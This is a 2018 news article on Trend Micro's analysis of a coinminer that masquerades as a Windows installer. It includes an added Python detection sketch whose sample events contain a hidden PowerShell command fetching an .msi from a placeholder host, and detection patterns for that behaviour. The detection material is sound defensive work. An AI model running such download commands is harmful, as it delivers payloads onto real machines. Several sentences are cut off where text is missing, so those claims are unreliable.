The obfuscation capabilities of cryptocurrency-mining malware authors are becoming increasingly sophisticated, according to cybersecurity researchers at Trend Micro.
This is evidenced by a new cryptocurrency-mining malware the researchers came across, which employs multiple evasion techniques to avoid detection. Identified as Coinminer.Win32.MALXMR.TIAOODAM, the malicious software poses as a Windows installer file when it arrives on the target machine. Using a genuine component of the Windows OS not only makes it appear less suspicious but also lets the malware bypass certain security filters.
From the analysis conducted by the cybersecurity researchers, the cryptojacking software installs itself in the folder %AppData%\Roaming\Microsoft\Windows\Template\FileZilla Server. FileZilla is a free, open-source application for transferring files over the internet. If the directory does not already exist, the malware creates it.
The files contained in the directory include a script created to terminate any anti-malware processes that may be running.
Somewhere in Eastern Europe…
The installation process of this particular malware involves further measures aimed at preventing detection. Interestingly, the installation is carried out in Cyrillic, indicating that the creators are possibly based in Eastern Europe or other regions that use that writing system.
After installation, the malware will create three new Service Host processes, some of which are used to re-download the malware in case of termination:
“The first and second SvcHost processes will act as a watchdog, most likely to remain persistent. These are responsible for re-downloading the Windows Installer (.msi) file via a PowerShell command when any of the injected svchost processes are terminated,” Trend Micro’s Janus Agcaoili and Gilbert Sison wrote in a .
The cryptomining malware also possesses a self-destruct mechanism intended to make detection and analysis even more difficult: it deletes every file in the installation directory and removes all other traces of the installation.
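As an added illustration (not code from the Trend Micro report or from this article), the following Python sketch shows how a defender could flag two of the behaviours described above in endpoint telemetry: files written under the reported FileZilla Server template directory, and svchost.exe spawning PowerShell to re-fetch an .msi package. The Sysmon-like event fields, the placeholder URL and the sample events are constructed assumptions.

```python
import re
from typing import Dict, List, Optional, Tuple

# Directory the coinminer uses, as reported by Trend Micro. Backslashes are
# escaped for the regex; the %AppData% prefix is matched as any profile path.
INSTALL_DIR_RE = re.compile(
    r"\\AppData\\Roaming\\Microsoft\\Windows\\Template\\FileZilla Server",
    re.IGNORECASE,
)
# A PowerShell download verb followed by an .msi reference models the watchdog re-fetch.
DOWNLOAD_RE = re.compile(r"(DownloadFile|Invoke-WebRequest|iwr)\b.*\.msi\b",
                         re.IGNORECASE | re.DOTALL)

def classify(event: Dict[str, str]) -> Optional[str]:
    """Return a finding label for one event, or None if nothing matches."""
    kind = event.get("type")
    if kind == "process_create":
        parent = event.get("parent_image", "").lower()
        image = event.get("image", "").lower()
        cmd = event.get("command_line", "")
        if parent.endswith("\\svchost.exe") and "powershell" in image and DOWNLOAD_RE.search(cmd):
            return "svchost-spawned PowerShell re-downloading an MSI (watchdog)"
        if INSTALL_DIR_RE.search(cmd):
            return "process referencing the fake FileZilla Server directory"
    elif kind == "file_create" and INSTALL_DIR_RE.search(event.get("target", "")):
        return "file dropped in the fake FileZilla Server directory"
    return None

def scan(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """Run every event through classify(); return (index, label) for each hit."""
    return [(i, lbl) for i, ev in enumerate(events) if (lbl := classify(ev))]

# Constructed sample events (not real telemetry) mimicking the infection chain.
SAMPLE_EVENTS = [
    {"type": "process_create", "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe", "command_line": "svchost.exe -k netsvcs"},
    {"type": "file_create", "target": r"C:\Users\alice\AppData\Roaming\Microsoft"
                                      r"\Windows\Template\FileZilla Server\kill.bat"},
    {"type": "process_create", "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -w hidden Invoke-WebRequest http://EXAMPLE-PLACEHOLDER/pkg.msi -OutFile x.msi"},
    {"type": "process_create", "parent_image": r"C:\Windows\explorer.exe",  # benign: no download verb
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell Get-ChildItem C:\\Temp\\setup.msi"},
]

if __name__ == "__main__":
    for idx, label in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {label}")
```

In production the same two rules would be expressed in the EDR or SIEM query language rather than Python, and the parent-process check would be widened to cover the injected svchost instances the researchers describe.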
Taking No Chances
According to Trend Micro’s researchers, the creators of the malware are also taking extra precautions to avoid detection by using WiX, a popular Windows Installer, as a packer.
This comes at a time when various studies have shown that incidences of cryptojacking are on the rise across the globe. As CCN reported in September, cybersecurity consortium Cyber Threat Alliance estimates that this year.
Earlier this year, Kaspersky Lab indicated that ransomware attacks were declining, and that this was down to the fact that , as it is more lucrative.
Published at Sun, 11 Nov 2018 00:20:02 +0000